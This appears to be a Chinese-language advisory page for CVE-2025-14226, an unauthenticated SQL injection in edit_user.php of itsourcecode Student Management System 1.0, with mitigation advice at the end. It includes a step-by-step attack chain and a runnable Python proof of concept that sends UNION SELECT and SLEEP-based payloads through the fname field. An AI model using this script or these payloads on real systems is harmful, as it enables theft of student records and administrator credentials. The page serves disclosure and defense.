CVE-2025-14226 itsourcecode学生管理系统edit_user.php文件fname参数SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-14226

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Student Management System 1.0

漏洞概述

CVE-2025-14226是itsourcecode Student Management System 1.0版本中的一个高危SQL注入漏洞。该漏洞存在于edit_user.php文件中，具体位于fname参数的处理逻辑中。由于应用程序在处理用户输入时未对fname参数进行充分的输入验证和SQL语句过滤，攻击者可以通过构造恶意的SQL代码片段注入到数据库查询中，从而实现未授权的数据库操作。此漏洞允许远程攻击者在无需任何认证的情况下利用，攻击复杂度低且利用难度小。成功利用此漏洞可能导致敏感用户数据泄露、数据库内容篡改，甚至可能通过数据库操作进一步获取服务器权限。该系统的其他参数也可能存在类似的SQL注入风险，需要进行全面的安全审计和修复。

技术细节

该SQL注入漏洞源于itsourcecode Student Management System 1.0的edit_user.php文件对用户输入的fname参数处理不当。在正常的用户编辑功能中，系统会从HTTP请求中获取fname参数值并直接拼接到SQL查询语句中，而未采用参数化查询或输入过滤机制。攻击者可以利用UNION SELECT、布尔盲注、时间盲注等技术手段提取数据库中的敏感信息，包括用户账号、密码哈希、角色权限等。典型的攻击payload包括使用单引号触发SQL语法错误、使用UNION语句联合查询、使用SLEEP()函数进行时间盲注等。由于漏洞存在于用户编辑功能中，攻击者可能利用获取的管理员凭据进一步控制整个学生管理系统，影响学校的学生信息安全和隐私保护。

攻击链分析

STEP 1

步骤1

信息收集：攻击者识别目标系统为itsourcecode Student Management System 1.0，并确认edit_user.php文件存在且可访问

STEP 2

步骤2

漏洞探测：攻击者访问edit_user.php页面，抓取用户编辑功能的HTTP请求，分析fname参数的提交方式和数据结构

STEP 3

步骤3

SQL注入测试：使用单引号(')、双连接符(--)等特殊字符测试fname参数，观察数据库错误响应或页面行为变化以确认SQL注入漏洞存在

STEP 4

步骤4

构建恶意Payload：攻击者构造UNION SELECT或布尔盲注/时间盲注语句，目标是提取数据库版本、当前用户、数据库名称等敏感信息

STEP 5

步骤5

数据提取：利用SQL注入获取数据库中的用户表结构，提取管理员账号、密码哈希、角色权限等敏感数据

STEP 6

步骤6

权限提升：使用获取的管理员凭据登录系统后台，进一步控制整个学生管理系统，可能导致大规模学生信息泄露

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-14226 PoC - itsourcecode Student Management System SQL Injection
# Target: edit_user.php fname parameter

def exploit_sqli(url, target_user_id):
    """
    SQL Injection PoC for CVE-2025-14226
    Target: itsourcecode Student Management System 1.0
    Vulnerable Parameter: fname in /edit_user.php
    """
    
    # Target URL
    target_url = f"{url}/edit_user.php"
    
    # Payload for SQL Injection (UNION-based extraction)
    # Extract database version, user, and current database
    payload = "' UNION SELECT 1,version(),user(),database(),5,6,7,8,9,10,11,12,13,14,15---"
    
    # Prepare request data
    data = {
        'fname': payload,
        'id': target_user_id,
        'btn_sub': '1'
    }
    
    print(f"[*] Targeting: {target_url}")
    print(f"[*] Payload: {payload}")
    
    try:
        response = requests.post(target_url, data=data, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Request sent successfully")
            print(f"[*] Response length: {len(response.text)}")
            
            # Check for database info in response
            if '5.7' in response.text or '8.0' in response.text or 'MariaDB' in response.text:
                print("[+] SQL Injection successful - Database version detected!")
                return True
            else:
                print("[-] SQL Injection may have failed - No obvious data leak")
                return False
                
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

def blind_sqli_time_based(url, target_user_id):
    """
    Time-based blind SQL injection alternative
    Use when UNION-based injection fails
    """
    
    # Time-based payload - causes 5 second delay if vulnerable
    payload = "' AND SLEEP(5)---"
    
    data = {
        'fname': payload,
        'id': target_user_id,
        'btn_sub': '1'
    }
    
    print(f"[*] Testing time-based blind SQLi...")
    
    try:
        import time
        start = time.time()
        response = requests.post(url, data=data, timeout=15)
        elapsed = time.time() - start
        
        if elapsed >= 5:
            print(f"[+] Time-based SQL Injection confirmed! Delay: {elapsed}s")
            return True
        else:
            print(f"[-] No time delay detected")
            return False
            
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-14226.py <target_url> <user_id>")
        print("Example: python cve-2025-14226.py http://target.com 1")
        sys.exit(1)
    
    target_url = sys.argv[1].rstrip('/')
    user_id = sys.argv[2]
    
    print("=" * 60)
    print("CVE-2025-14226 SQL Injection PoC")
    print("Target: itsourcecode Student Management System 1.0")
    print("Vulnerability: SQL Injection in /edit_user.php fname parameter")
    print("=" * 60)
    
    # Try UNION-based injection
    exploit_sqli(target_url, user_id)
    
    print("\n[*] PoC execution completed")

影响范围

itsourcecode Student Management System 1.0

防御指南

临时缓解措施

在厂商发布正式安全补丁之前，建议采取以下临时缓解措施：1) 在Web应用层实现输入过滤，对fname等用户可控参数进行严格的正则验证；2) 在Web服务器前端部署WAF规则阻止可疑的SQL注入特征；3) 限制edit_user.php等管理功能的访问IP范围；4) 临时禁用用户编辑功能或将其设置为只读模式；5) 加强数据库账户权限控制，移除不必要的数据库写操作权限；6) 启用详细的访问日志和数据库审计，及时发现异常查询行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14226
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14226
3 Details https://www.cvedetails.com/cve/CVE-2025-14226/
4 VulDB https://vuldb.com/cve/CVE-2025-14226
5 Link https://github.com/ltranquility/CVE/issues/17
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/?ctiid.334668
8 Link https://vuldb.com/?id.334668
9 Link https://vuldb.com/?submit.701801